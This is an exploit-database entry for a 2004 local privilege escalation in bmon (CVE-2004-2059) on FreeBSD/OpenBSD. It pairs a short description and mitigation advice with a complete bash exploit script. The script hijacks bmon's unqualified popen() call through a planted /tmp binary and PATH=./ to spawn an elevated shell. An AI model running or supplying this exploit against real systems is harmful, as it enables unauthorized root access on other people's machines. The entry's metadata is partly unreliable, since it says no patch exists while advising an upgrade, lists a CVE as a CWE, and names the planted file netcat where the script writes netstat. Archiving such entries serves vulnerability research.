Local Privilege Escalation in bmon

vendor:

bmon

by:

Idan Nahoum

7.5

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: bmon

Affected Version From: < 1.2.1_2

Affected Version To: < 1.2.1_2

Patch Exists: NO

Related CWE: CVE-2004-2059

CPE: a:bmon:bmon:1.2.1

Metasploit:

Other Scripts:

Platforms Tested: FreeBSD, OpenBSD

2004

Local Privilege Escalation in bmon

This exploit is for FreeBSD/OpenBSD systems with bmon version less than 1.2.1_2 installed. When bmon is executed with the -n parameter, it uses popen() to execute netcat without providing an absolute path. Some BSDs have ACLs that do not allow setuid files to run unless explicitly allowed. Therefore, creating a file called netcat and chmod'ing +s bash would not work. In order to get a usable shell, stdout needs to be redirected to stderr (as stdout is closed), and the stty settings need to be restored. The exploit takes advantage of this vulnerability to execute a shell with elevated privileges.

Mitigation:

Upgrade to bmon version 1.2.1_2 or later. Ensure that the PATH environment variable is properly set and does not include any untrusted or malicious directories. Consider implementing stricter ACLs to prevent unauthorized execution of setuid files.

Source

Exploit-DB raw data:

#!/usr/local/bin/bash

# Written by Idan Nahoum. idanna@bk.ru
# local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.
# when bmon is executed with the -n parameter it popen()s netcat
# but fail to provide an absoluth path.
# some bsds are configured with acls that doesnt allow setuid files to 
# run except those that are explicity allowed, so creating a file called 
# netcat that chmod's +s bash wouldnt work, bash needs to run directly by
# bmon which uses ncurses, so to get a useable shell we need to redirect
# stdout to stderr (stdout is closed), and restore the stty settings.
# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html

declare -r SPATH="${PATH}"
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g) 
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"

echo "$0 <path to bmon> [default: ${BMON_EXEC}]"

[ "$#" -gt "0" ] && BMON_EXEC="${1}"

[ -x "${BMON_EXEC}" ] || 
{
echo "${BMON_EXEC} not found"
exit
}

cd /tmp

# apparently bmon closes stdout, so we run a shell with stdout redirected 
# to stderr.

cat > ./netstat <<EOF
${STTY_EXEC} ${STTY_SETTINGS}
PATH=${SPATH} /bin/sh 1>&2
EOF

/bin/chmod 755 ./netstat
echo "trying to exploit"
PATH=./ "${BMON_EXEC}" -n 

# milw0rm.com [2004-10-16]